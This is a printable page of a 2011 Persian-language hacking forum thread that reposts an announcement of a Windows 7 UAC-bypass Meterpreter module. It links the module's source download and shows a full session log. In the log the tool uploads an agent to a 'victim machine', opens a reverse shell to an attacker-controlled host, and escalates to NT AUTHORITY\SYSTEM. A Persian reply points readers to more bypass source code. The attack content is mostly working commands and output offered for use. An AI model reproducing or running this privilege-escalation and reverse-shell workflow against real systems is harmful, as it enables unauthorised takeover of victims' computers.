Parsi Coders
Bypass Windows 7 x86/x64 UAC Fully Patched – Meterpreter Module - نسخه قابل چاپ

+- Parsi Coders (http://parsicoders.com)
+-- انجمن: Security and influence (http://parsicoders.com/forumdisplay.php?fid=59)
+--- انجمن: Influence (http://parsicoders.com/forumdisplay.php?fid=61)
+--- موضوع: Bypass Windows 7 x86/x64 UAC Fully Patched – Meterpreter Module (/showthread.php?tid=94)



Bypass Windows 7 x86/x64 UAC Fully Patched – Meterpreter Module - Amin_Mansouri - 04-28-2011

It all came about when Kevin Mitnick was on a pentest and needed to bypass Windows 7 UAC. We stumbled upon an old post from Leo Davidson (http://www.pretentiousname.com/misc/win7_uac_whitelist2.html) on bypassing Windows UAC. This method takes advantage of process injection that has a trusted Windows Publisher Certificate (example explorer.exe which runs at medium integrity). This is fully functioning on both x86/64 bit platforms. Source code is in the zip along with the meterpreter plugin. You can download :
http://www.secmaniac.com/files/bypassuac.zip

کد:
[*] Starting interaction with 1…
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > run bypassuac
[*] Creating a reverse meterpreter stager: LHOST=172.16.32.128 LPORT=4546
[*] Running payload handler
[*] Uploading Windows UACBypass to victim machine.
[*] Bypassing UAC Restrictions on the system….
[*] Meterpreter stager executable 73802 bytes long
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 172.16.32.128:4546 with UACBypass in effect…

meterpreter > [*] Meterpreter session 2 opened (172.16.32.128:4546 -> 172.16.32.130:1547) at Fri Dec 31 20:43:40 -0500 2010

meterpreter >
Background session 1? [y/N]
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getsystem
…got system (via technique 1).
meterpreter > shell
Process 416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>



RE: Bypass Windows 7 x86/x64 UAC Fully Patched – Meterpreter Module - Amin_Mansouri - 04-28-2011

قبل از اینکه توضیحاتی بدم این قسمت رو مطالعه فرمایید :
http://parsicoders.com/showthread.php?tid=95&action=lastpost
در پست بالا روشهای bypass ویندوز 7 رو گفتن به همراه سورس کدی در این ضمینه
موفق باشید